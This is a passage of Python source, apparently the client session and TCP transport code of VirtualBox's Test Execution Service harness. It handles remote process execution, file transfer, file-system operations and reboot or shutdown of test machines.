# Loop till the process completes, feed input to the TXS and
# receive output from it.
sFailure = "";
msPendingInputReply = None;
cbMsg, sOpcode, abPayload = (None, None, None);
while True:
# Pending input?
if msPendingInputReply is None \
and oStdIn is not None \
and not utils.isString(oStdIn):
try:
sInput = oStdIn.read(65536);
except:
reporter.errorXcpt('read standard in');
sFailure = 'exception reading stdin';
rc = None;
break;
if sInput:
oStdIn.uTxsClientCrc32 = zlib.crc32(sInput, oStdIn.uTxsClientCrc32);
# Convert to a byte array before handing it of to sendMsg or the string
# will get some zero termination added breaking the CRC (and injecting
# unwanted bytes).
abInput = array.array('B', sInput);
rc = self.sendMsg('STDIN', (long(oStdIn.uTxsClientCrc32 & 0xffffffff), abInput));
if rc is not True:
sFailure = 'sendMsg failure';
break;
msPendingInputReply = base.timestampMilli();
continue;
rc = self.sendMsg('STDINEOS');
oStdIn = None;
if rc is not True:
sFailure = 'sendMsg failure';
break;
msPendingInputReply = base.timestampMilli();
# Wait for input (500 ms timeout).
if cbMsg is None:
cbMsg, sOpcode, abPayload = self.recvReply(cMsTimeout=500, fNoDataOk=True);
if cbMsg is None:
# Check for time out before restarting the loop.
# Note! Only doing timeout checking here does mean that
# the TXS may prevent us from timing out by
# flooding us with data. This is unlikely though.
if self.hasTimedOut() \
and ( msPendingInputReply is None \
or base.timestampMilli() - msPendingInputReply > 30000):
reporter.maybeErr(self.fErr, 'taskExecEx: timed out');
sFailure = 'timeout';
rc = None;
break;
# Check that the connection is OK.
if not self.oTransport.isConnectionOk():
self.oTransport.disconnect();
sFailure = 'disconnected';
rc = False;
break;
continue;
# Handle the response.
sOpcode = sOpcode.rstrip();
if sOpcode == 'STDOUT':
oOut = oStdOut;
elif sOpcode == 'STDERR':
oOut = oStdErr;
elif sOpcode == 'TESTPIPE':
oOut = oTestPipe;
else:
oOut = None;
if oOut is not None:
# Output from the process.
if len(abPayload) < 4:
sFailure = 'malformed output packet (%s, %u bytes)' % (sOpcode, cbMsg);
reporter.maybeErr(self.fErr, 'taskExecEx: %s' % (sFailure));
rc = None;
break;
uStreamCrc32 = getU32(abPayload, 0);
oOut.uTxsClientCrc32 = zlib.crc32(abPayload[4:], oOut.uTxsClientCrc32);
if uStreamCrc32 != (oOut.uTxsClientCrc32 & 0xffffffff):
sFailure = 'crc error - mine=%#x their=%#x (%s, %u bytes)' \
% (oOut.uTxsClientCrc32 & 0xffffffff, uStreamCrc32, sOpcode, cbMsg);
reporter.maybeErr(self.fErr, 'taskExecEx: %s' % (sFailure));
rc = None;
break;
try:
oOut.write(abPayload[4:]);
except:
sFailure = 'exception writing %s' % (sOpcode);
reporter.errorXcpt('taskExecEx: %s' % (sFailure));
rc = None;
break;
elif sOpcode == 'STDINIGN' and msPendingInputReply is not None:
# Standard input is ignored. Ignore this condition for now.
msPendingInputReply = None;
reporter.log('taskExecEx: Standard input is ignored... why?');
del oStdIn.uTxsClientCrc32;
oStdIn = '/dev/null';
elif (sOpcode == 'STDINMEM' or sOpcode == 'STDINBAD' or sOpcode == 'STDINCRC')\
and msPendingInputReply is not None:
# TXS STDIN error, abort.
# TODO: STDINMEM - consider undoing the previous stdin read and try resubmitt it.
msPendingInputReply = None;
sFailure = 'TXS is out of memory for std input buffering';
reporter.maybeErr(self.fErr, 'taskExecEx: %s' % (sFailure));
rc = None;
break;
elif sOpcode == 'ACK' and msPendingInputReply is not None:
msPendingInputReply = None;
elif sOpcode.startswith('PROC '):
# Process status message, handle it outside the loop.
rc = True;
break;
else:
sFailure = 'Unexpected opcode %s' % (sOpcode);
reporter.maybeErr(self.fErr, 'taskExecEx: %s' % (sFailure));
rc = None;
break;
# Clear the message.
cbMsg, sOpcode, abPayload = (None, None, None);
# If we sent an STDIN packet and didn't get a reply yet, we'll give
# TXS some 5 seconds to reply to this. If we don't wait here we'll
# get screwed later on if we mix it up with the reply to some other
# command. Hackish.
if msPendingInputReply is not None:
cbMsg2, sOpcode2, abPayload2 = self.oTransport.recvMsg(5000);
if cbMsg2 is not None:
reporter.log('taskExecEx: Out of order STDIN, got reply: %s, %s, %s [ignored]'
% (cbMsg2, sOpcode2, abPayload2));
msPendingInputReply = None;
else:
reporter.maybeErr(self.fErr, 'taskExecEx: Pending STDIN, no reply after 5 secs!');
self.fScrewedUpMsgState = True;
# Parse the exit status (True), abort (None) or do nothing (False).
if rc is True:
if sOpcode != 'PROC OK':
# Do proper parsing some other day if needed:
# PROC TOK, PROC TOA, PROC DWN, PROC DOO,
# PROC NOK + rc, PROC SIG + sig, PROC ABD, FAILED.
rc = False;
else:
if rc is None:
# Abort it.
reporter.log('taskExecEx: sending ABORT...');
rc = self.sendMsg('ABORT');
while rc is True:
cbMsg, sOpcode, abPayload = self.oTransport.recvMsg(30000);
if cbMsg is None:
reporter.maybeErr(self.fErr, 'taskExecEx: Pending ABORT, no reply after 30 secs!')
self.fScrewedUpMsgState = True;
break;
if sOpcode.startswith('PROC '):
reporter.log('taskExecEx: ABORT reply: %s, %s, %s [ignored]' % (cbMsg, sOpcode, abPayload));
break;
reporter.log('taskExecEx: ABORT in process, ignoring reply: %s, %s, %s' % (cbMsg, sOpcode, abPayload));
# Check that the connection is OK before looping.
if not self.oTransport.isConnectionOk():
self.oTransport.disconnect();
break;
# Fake response with the reason why we quit.
if sFailure is not None:
self.t3oReply = (0, 'EXECFAIL', sFailure);
rc = None;
else:
rc = None;
# Cleanup.
for o in (oStdIn, oStdOut, oStdErr, oTestPipe):
if o is not None and not utils.isString(o):
del o.uTxsClientCrc32; # pylint: disable=E1103
# Make sure all files are closed
o.close(); # pylint: disable=E1103
reporter.log('taskExecEx: returns %s' % (rc));
return rc;
#
# Admin tasks
#
def hlpRebootShutdownWaitForAck(self, sCmd):
"""Wait for reboot/shutodwn ACK."""
rc = self.recvAckLogged(sCmd);
if rc is True:
# poll a little while for server to disconnect.
uMsStart = base.timestampMilli();
while self.oTransport.isConnectionOk() \
and base.timestampMilli() - uMsStart >= 5000:
if self.oTransport.isRecvPending(min(500, self.getMsLeft())):
break;
self.oTransport.disconnect();
return rc;
def taskReboot(self):
rc = self.sendMsg('REBOOT');
if rc is True:
rc = self.hlpRebootShutdownWaitForAck('REBOOT');
return rc;
def taskShutdown(self):
rc = self.sendMsg('SHUTDOWN');
if rc is True:
rc = self.hlpRebootShutdownWaitForAck('SHUTDOWN');
return rc;
#
# CD/DVD control tasks.
#
## TODO
#
# File system tasks
#
def taskMkDir(self, sRemoteDir, fMode):
rc = self.sendMsg('MKDIR', (fMode, sRemoteDir));
if rc is True:
rc = self.recvAckLogged('MKDIR');
return rc;
def taskMkDirPath(self, sRemoteDir, fMode):
rc = self.sendMsg('MKDRPATH', (fMode, sRemoteDir));
if rc is True:
rc = self.recvAckLogged('MKDRPATH');
return rc;
def taskMkSymlink(self, sLinkTarget, sLink):
rc = self.sendMsg('MKSYMLNK', (sLinkTarget, sLink));
if rc is True:
rc = self.recvAckLogged('MKSYMLNK');
return rc;
def taskRmDir(self, sRemoteDir):
rc = self.sendMsg('RMDIR', (sRemoteDir,));
if rc is True:
rc = self.recvAckLogged('RMDIR');
return rc;
def taskRmFile(self, sRemoteFile):
rc = self.sendMsg('RMFILE', (sRemoteFile,));
if rc is True:
rc = self.recvAckLogged('RMFILE');
return rc;
def taskRmSymlink(self, sRemoteSymlink):
rc = self.sendMsg('RMSYMLNK', (sRemoteSymlink,));
if rc is True:
rc = self.recvAckLogged('RMSYMLNK');
return rc;
def taskRmTree(self, sRemoteTree):
rc = self.sendMsg('RMTREE', (sRemoteTree,));
if rc is True:
rc = self.recvAckLogged('RMTREE');
return rc;
#def "CHMOD "
#def "CHOWN "
#def "CHGRP "
def taskIsDir(self, sRemoteDir):
rc = self.sendMsg('ISDIR', (sRemoteDir,));
if rc is True:
rc = self.recvTrueFalse('ISDIR');
return rc;
def taskIsFile(self, sRemoteFile):
rc = self.sendMsg('ISFILE', (sRemoteFile,));
if rc is True:
rc = self.recvTrueFalse('ISFILE');
return rc;
def taskIsSymlink(self, sRemoteSymlink):
rc = self.sendMsg('ISSYMLNK', (sRemoteSymlink,));
if rc is True:
rc = self.recvTrueFalse('ISSYMLNK');
return rc;
#def "STAT "
#def "LSTAT "
#def "LIST "
def taskUploadFile(self, sLocalFile, sRemoteFile):
#
# Open the local file (make sure it exist before bothering TXS) and
# tell TXS that we want to upload a file.
#
try:
oLocalFile = utils.openNoInherit(sLocalFile, 'rb');
except:
reporter.errorXcpt('taskUpload: failed to open "%s"' % (sLocalFile));
return False;
# Common cause with taskUploadStr
rc = self.taskUploadCommon(oLocalFile, sRemoteFile);
# Cleanup.
oLocalFile.close();
return rc;
def taskUploadString(self, sContent, sRemoteFile):
# Wrap sContent in a file like class.
class InStringFile(object): # pylint: disable=R0903
def __init__(self, sContent):
self.sContent = sContent;
self.off = 0;
def read(self, cbMax):
cbLeft = len(self.sContent) - self.off;
if cbLeft == 0:
return "";
if cbLeft <= cbMax:
sRet = self.sContent[self.off:(self.off + cbLeft)];
else:
sRet = self.sContent[self.off:(self.off + cbMax)];
self.off = self.off + len(sRet);
return sRet;
oLocalString = InStringFile(sContent);
return self.taskUploadCommon(oLocalString, sRemoteFile);
def taskUploadCommon(self, oLocalFile, sRemoteFile):
"""Common worker used by taskUploadFile and taskUploadString."""
# Command + ACK.
rc = self.sendMsg('PUT FILE', (sRemoteFile,));
if rc is True:
rc = self.recvAckLogged('PUT FILE');
if rc is True:
#
# Push data packets until eof.
#
uMyCrc32 = zlib.crc32(b'');
while True:
# Read up to 64 KB of data.
try:
sRaw = oLocalFile.read(65536);
except:
rc = None;
break;
# Convert to array - this is silly!
abBuf = array.array('B');
if utils.isString(sRaw):
for i, _ in enumerate(sRaw):
abBuf.append(ord(sRaw[i]));
else:
abBuf.extend(sRaw);
sRaw = None;
# Update the file stream CRC and send it off.
uMyCrc32 = zlib.crc32(abBuf, uMyCrc32);
if not abBuf:
rc = self.sendMsg('DATA EOF', (long(uMyCrc32 & 0xffffffff), ));
else:
rc = self.sendMsg('DATA ', (long(uMyCrc32 & 0xffffffff), abBuf));
if rc is False:
break;
# Wait for the reply.
rc = self.recvAck();
if rc is not True:
if rc is False:
reporter.maybeErr(self.fErr, 'taskUpload: transport error waiting for ACK');
else:
reporter.maybeErr(self.fErr, 'taskUpload: DATA response was %s: %s' % (rc[0], rc[1]));
rc = False;
break;
# EOF?
if not abBuf:
break;
# Send ABORT on ACK and I/O errors.
if rc is None:
rc = self.sendMsg('ABORT');
if rc is True:
self.recvAckLogged('ABORT');
rc = False;
return rc;
def taskDownloadFile(self, sRemoteFile, sLocalFile):
try:
oLocalFile = utils.openNoInherit(sLocalFile, 'wb');
except:
reporter.errorXcpt('taskDownload: failed to open "%s"' % (sLocalFile));
return False;
rc = self.taskDownloadCommon(sRemoteFile, oLocalFile);
oLocalFile.close();
if rc is False:
try:
os.remove(sLocalFile);
except:
reporter.errorXcpt();
return rc;
def taskDownloadString(self, sRemoteFile, sEncoding = 'utf-8', fIgnoreEncodingErrors = True):
# Wrap sContent in a file like class.
class OutStringFile(object): # pylint: disable=R0903
def __init__(self):
self.asContent = [];
def write(self, sBuf):
self.asContent.append(sBuf);
return None;
oLocalString = OutStringFile();
rc = self.taskDownloadCommon(sRemoteFile, oLocalString);
if rc is True:
rc = '';
for sBuf in oLocalString.asContent:
if hasattr(sBuf, 'decode'):
rc += sBuf.decode(sEncoding, 'ignore' if fIgnoreEncodingErrors else 'strict');
else:
rc += sBuf;
return rc;
def taskDownloadCommon(self, sRemoteFile, oLocalFile):
"""Common worker for taskDownloadFile and taskDownloadString."""
rc = self.sendMsg('GET FILE', (sRemoteFile,))
if rc is True:
#
# Process data packets until eof.
#
uMyCrc32 = zlib.crc32(b'');
while rc is True:
cbMsg, sOpcode, abPayload = self.recvReply();
if cbMsg is None:
reporter.maybeErr(self.fErr, 'taskDownload got 3xNone from recvReply.');
rc = None;
break;
# Validate.
sOpcode = sOpcode.rstrip();
if sOpcode != 'DATA' and sOpcode != 'DATA EOF':
reporter.maybeErr(self.fErr, 'taskDownload got a error reply: opcode="%s" details="%s"'
% (sOpcode, getSZ(abPayload, 0, "None")));
rc = False;
break;
if sOpcode == 'DATA' and len(abPayload) < 4:
reporter.maybeErr(self.fErr, 'taskDownload got a bad DATA packet: len=%u' % (len(abPayload)));
rc = None;
break;
if sOpcode == 'DATA EOF' and len(abPayload) != 4:
reporter.maybeErr(self.fErr, 'taskDownload got a bad EOF packet: len=%u' % (len(abPayload)));
rc = None;
break;
# Check the CRC (common for both packets).
uCrc32 = getU32(abPayload, 0);
if sOpcode == 'DATA':
uMyCrc32 = zlib.crc32(abPayload[4:], uMyCrc32);
if uCrc32 != (uMyCrc32 & 0xffffffff):
reporter.maybeErr(self.fErr, 'taskDownload got a bad CRC: mycrc=%s remotecrc=%s'
% (hex(uMyCrc32), hex(uCrc32)));
rc = None;
break;
if sOpcode == 'DATA EOF':
rc = self.sendMsg('ACK');
break;
# Finally, push the data to the file.
try:
oLocalFile.write(abPayload[4:].tostring());
except:
reporter.errorXcpt('I/O error writing to "%s"' % (sRemoteFile));
rc = None;
break;
rc = self.sendMsg('ACK');
# Send NACK on validation and I/O errors.
if rc is None:
rc = self.sendMsg('NACK');
rc = False;
return rc;
def taskUnpackFile(self, sRemoteFile, sRemoteDir):
rc = self.sendMsg('UNPKFILE', (sRemoteFile, sRemoteDir));
if rc is True:
rc = self.recvAckLogged('UNPKFILE');
return rc;
# pylint: enable=C0111
#
# Public methods - generic task queries
#
def isSuccess(self):
"""Returns True if the task completed successfully, otherwise False."""
self.lockTask();
sStatus = self.sStatus;
oTaskRc = self.oTaskRc;
self.unlockTask();
if sStatus != "":
return False;
if oTaskRc is False or oTaskRc is None:
return False;
return True;
def getResult(self):
"""
Returns the result of a completed task.
Returns None if not completed yet or no previous task.
"""
self.lockTask();
sStatus = self.sStatus;
oTaskRc = self.oTaskRc;
self.unlockTask();
if sStatus != "":
return None;
return oTaskRc;
def getLastReply(self):
"""
Returns the last reply three-tuple: cbMsg, sOpcode, abPayload.
Returns a None, None, None three-tuple if there was no last reply.
"""
self.lockTask();
t3oReply = self.t3oReply;
self.unlockTask();
return t3oReply;
#
# Public methods - connection.
#
def asyncDisconnect(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a disconnect task.
Returns True on success, False on failure (logged).
The task returns True on success and False on failure.
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "bye", self.taskBye);
def syncDisconnect(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncDisconnect, cMsTimeout, fIgnoreErrors);
def asyncUuid(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a task for getting the TXS UUID.
Returns True on success, False on failure (logged).
The task returns UUID string (in {}) on success and False on failure.
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "bye", self.taskUuid);
def syncUuid(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncUuid, cMsTimeout, fIgnoreErrors);
#
# Public methods - execution.
#
def asyncExecEx(self, sExecName, asArgs = (), asAddEnv = (), # pylint: disable=R0913
oStdIn = None, oStdOut = None, oStdErr = None, oTestPipe = None,
sAsUser = "", cMsTimeout = 3600000, fIgnoreErrors = False):
"""
Initiates a exec process task.
Returns True on success, False on failure (logged).
The task returns True if the process exited normally with status code 0.
The task returns None if on failure prior to executing the process, and
False if the process exited with a different status or in an abnormal
manner. Both None and False are logged of course and further info can
also be obtained by getLastReply().
The oStdIn, oStdOut, oStdErr and oTestPipe specifiy how to deal with
these streams. If None, no special action is taken and the output goes
to where ever the TXS sends its output, and ditto for input.
- To send to / read from the bitbucket, pass '/dev/null'.
- To redirect to/from a file, just specify the remote filename.
- To append to a file use '>>' followed by the remote filename.
- To pipe the stream to/from the TXS, specify a file like
object. For StdIn a non-blocking read() method is required. For
the other a write() method is required. Watch out for deadlock
conditions between StdIn and StdOut/StdErr/TestPipe piping.
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "exec", self.taskExecEx,
(sExecName, long(0), asArgs, asAddEnv, oStdIn,
oStdOut, oStdErr, oTestPipe, sAsUser));
def syncExecEx(self, sExecName, asArgs = (), asAddEnv = (), # pylint: disable=R0913
oStdIn = '/dev/null', oStdOut = '/dev/null',
oStdErr = '/dev/null', oTestPipe = '/dev/null',
sAsUser = '', cMsTimeout = 3600000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncExecEx, sExecName, asArgs, asAddEnv, oStdIn, oStdOut, \
oStdErr, oTestPipe, sAsUser, cMsTimeout, fIgnoreErrors);
def asyncExec(self, sExecName, asArgs = (), asAddEnv = (), sAsUser = "", fWithTestPipe = True, sPrefix = '', \
cMsTimeout = 3600000, fIgnoreErrors = False):
"""
Initiates a exec process test task.
Returns True on success, False on failure (logged).
The task returns True if the process exited normally with status code 0.
The task returns None if on failure prior to executing the process, and
False if the process exited with a different status or in an abnormal
manner. Both None and False are logged of course and further info can
also be obtained by getLastReply().
Standard in is taken from /dev/null. While both standard output and
standard error goes directly to reporter.log(). The testpipe is piped
to reporter.xxxx.
"""
sStdIn = '/dev/null';
oStdOut = reporter.FileWrapper('%sstdout' % sPrefix);
oStdErr = reporter.FileWrapper('%sstderr' % sPrefix);
if fWithTestPipe: oTestPipe = reporter.FileWrapperTestPipe();
else: oTestPipe = '/dev/null'; # pylint: disable=redefined-variable-type
return self.startTask(cMsTimeout, fIgnoreErrors, "exec", self.taskExecEx,
(sExecName, long(0), asArgs, asAddEnv, sStdIn, oStdOut, oStdErr, oTestPipe, sAsUser));
def syncExec(self, sExecName, asArgs = (), asAddEnv = (), sAsUser = '', fWithTestPipe = True, sPrefix = '',
cMsTimeout = 3600000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncExec, sExecName, asArgs, asAddEnv, sAsUser, fWithTestPipe, sPrefix, \
cMsTimeout, fIgnoreErrors);
#
# Public methods - system
#
def asyncReboot(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a reboot task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged). The
session will be disconnected on successful task completion.
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "reboot", self.taskReboot, ());
def syncReboot(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncReboot, cMsTimeout, fIgnoreErrors);
def asyncShutdown(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a shutdown task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "shutdown", self.taskShutdown, ());
def syncShutdown(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncShutdown, cMsTimeout, fIgnoreErrors);
#
# Public methods - file system
#
def asyncMkDir(self, sRemoteDir, fMode = 0o700, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a mkdir task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "mkDir", self.taskMkDir, (sRemoteDir, long(fMode)));
def syncMkDir(self, sRemoteDir, fMode = 0o700, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncMkDir, sRemoteDir, long(fMode), cMsTimeout, fIgnoreErrors);
def asyncMkDirPath(self, sRemoteDir, fMode = 0o700, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a mkdir -p task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "mkDirPath", self.taskMkDirPath, (sRemoteDir, long(fMode)));
def syncMkDirPath(self, sRemoteDir, fMode = 0o700, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncMkDirPath, sRemoteDir, long(fMode), cMsTimeout, fIgnoreErrors);
def asyncMkSymlink(self, sLinkTarget, sLink, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a symlink task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "mkSymlink", self.taskMkSymlink, (sLinkTarget, sLink));
def syncMkSymlink(self, sLinkTarget, sLink, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncMkSymlink, sLinkTarget, sLink, cMsTimeout, fIgnoreErrors);
def asyncRmDir(self, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a rmdir task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "rmDir", self.taskRmDir, (sRemoteDir,));
def syncRmDir(self, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncRmDir, sRemoteDir, cMsTimeout, fIgnoreErrors);
def asyncRmFile(self, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a rmfile task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "rmFile", self.taskRmFile, (sRemoteFile,));
def syncRmFile(self, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncRmFile, sRemoteFile, cMsTimeout, fIgnoreErrors);
def asyncRmSymlink(self, sRemoteSymlink, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a rmsymlink task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "rmSymlink", self.taskRmSymlink, (sRemoteSymlink,));
def syncRmSymlink(self, sRemoteSymlink, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncRmSymlink, sRemoteSymlink, cMsTimeout, fIgnoreErrors);
def asyncRmTree(self, sRemoteTree, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a rmtree task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "rmTree", self.taskRmTree, (sRemoteTree,));
def syncRmTree(self, sRemoteTree, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncRmTree, sRemoteTree, cMsTimeout, fIgnoreErrors);
#def "CHMOD "
#def "CHOWN "
#def "CHGRP "
def asyncIsDir(self, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a is-dir query task.
Returns True on success, False on failure (logged).
The task returns True if it's a directory, False if it isn't, and
None on error (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "isDir", self.taskIsDir, (sRemoteDir,));
def syncIsDir(self, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncIsDir, sRemoteDir, cMsTimeout, fIgnoreErrors);
def asyncIsFile(self, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a is-file query task.
Returns True on success, False on failure (logged).
The task returns True if it's a file, False if it isn't, and None on
error (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "isFile", self.taskIsFile, (sRemoteFile,));
def syncIsFile(self, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncIsFile, sRemoteFile, cMsTimeout, fIgnoreErrors);
def asyncIsSymlink(self, sRemoteSymlink, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a is-symbolic-link query task.
Returns True on success, False on failure (logged).
The task returns True if it's a symbolic linke, False if it isn't, and
None on error (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "isSymlink", self.taskIsSymlink, (sRemoteSymlink,));
def syncIsSymlink(self, sRemoteSymlink, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncIsSymlink, sRemoteSymlink, cMsTimeout, fIgnoreErrors);
#def "STAT "
#def "LSTAT "
#def "LIST "
def asyncUploadFile(self, sLocalFile, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a download query task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "upload", self.taskUploadFile, (sLocalFile, sRemoteFile));
def syncUploadFile(self, sLocalFile, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncUploadFile, sLocalFile, sRemoteFile, cMsTimeout, fIgnoreErrors);
def asyncUploadString(self, sContent, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a upload string task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "uploadString", self.taskUploadString, (sContent, sRemoteFile));
def syncUploadString(self, sContent, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncUploadString, sContent, sRemoteFile, cMsTimeout, fIgnoreErrors);
def asyncDownloadFile(self, sRemoteFile, sLocalFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a download file task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "downloadFile", self.taskDownloadFile, (sRemoteFile, sLocalFile));
def syncDownloadFile(self, sRemoteFile, sLocalFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncDownloadFile, sRemoteFile, sLocalFile, cMsTimeout, fIgnoreErrors);
def asyncDownloadString(self, sRemoteFile, sEncoding = 'utf-8', fIgnoreEncodingErrors = True,
cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a download string task.
Returns True on success, False on failure (logged).
The task returns a byte string on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "downloadString",
self.taskDownloadString, (sRemoteFile, sEncoding, fIgnoreEncodingErrors));
def syncDownloadString(self, sRemoteFile, sEncoding = 'utf-8', fIgnoreEncodingErrors = True,
cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncDownloadString, sRemoteFile, sEncoding, fIgnoreEncodingErrors,
cMsTimeout, fIgnoreErrors);
def asyncUnpackFile(self, sRemoteFile, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a unpack file task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "unpackFile", self.taskUnpackFile, \
(sRemoteFile, sRemoteDir));
def syncUnpackFile(self, sRemoteFile, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncUnpackFile, sRemoteFile, sRemoteDir, cMsTimeout, fIgnoreErrors);
class TransportTcp(TransportBase):
"""
TCP transport layer for the TXS client session class.
"""
def __init__(self, sHostname, uPort, fReversedSetup):
"""
Save the parameters. The session will call us back to make the
connection later on its worker thread.
"""
TransportBase.__init__(self, utils.getCallerName());
self.sHostname = sHostname;
self.fReversedSetup = fReversedSetup;
self.uPort = uPort if uPort is not None else 5042 if fReversedSetup is False else 5048;
self.oSocket = None;
self.oWakeupW = None;
self.oWakeupR = None;
self.fConnectCanceled = False;
self.fIsConnecting = False;
self.oCv = threading.Condition();
self.abReadAhead = array.array('B');
def toString(self):
return '<%s sHostname=%s, fReversedSetup=%s, uPort=%s, oSocket=%s,'\
' fConnectCanceled=%s, fIsConnecting=%s, oCv=%s, abReadAhead=%s>' \
% (TransportBase.toString(self), self.sHostname, self.fReversedSetup, self.uPort, self.oSocket,
self.fConnectCanceled, self.fIsConnecting, self.oCv, self.abReadAhead);
def __isInProgressXcpt(self, oXcpt):
""" In progress exception? """
try:
if isinstance(oXcpt, socket.error):
try:
if oXcpt.errno == errno.EINPROGRESS:
return True;
except: pass;
# Windows?
try:
if oXcpt.errno == errno.EWOULDBLOCK:
return True;
except: pass;
except:
pass;
return False;
def __isWouldBlockXcpt(self, oXcpt):
""" Would block exception? """
try:
if isinstance(oXcpt, socket.error):
try:
if oXcpt.errno == errno.EWOULDBLOCK:
return True;
except: pass;
try:
if oXcpt.errno == errno.EAGAIN:
return True;
except: pass;
except:
pass;
return False;
def __isConnectionReset(self, oXcpt):
""" Connection reset by Peer or others. """
try:
if isinstance(oXcpt, socket.error):
try:
if oXcpt.errno == errno.ECONNRESET:
return True;
except: pass;
try:
if oXcpt.errno == errno.ENETRESET:
return True;
except: pass;
except:
pass;
return False;
def _closeWakeupSockets(self):
""" Closes the wakup sockets. Caller should own the CV. """
oWakeupR = self.oWakeupR;
self.oWakeupR = None;
if oWakeupR is not None:
oWakeupR.close();
oWakeupW = self.oWakeupW;
self.oWakeupW = None;
if oWakeupW is not None:
oWakeupW.close();
return None;
def cancelConnect(self):
# This is bad stuff.
self.oCv.acquire();
reporter.log2('TransportTcp::cancelConnect: fIsConnecting=%s oSocket=%s' % (self.fIsConnecting, self.oSocket));
self.fConnectCanceled = True;
if self.fIsConnecting:
oSocket = self.oSocket;
self.oSocket = None;
if oSocket is not None:
reporter.log2('TransportTcp::cancelConnect: closing the socket');
oSocket.close();
oWakeupW = self.oWakeupW;
self.oWakeupW = None;
if oWakeupW is not None:
reporter.log2('TransportTcp::cancelConnect: wakeup call');
try: oWakeupW.send('cancelled!\n');
except: reporter.logXcpt();
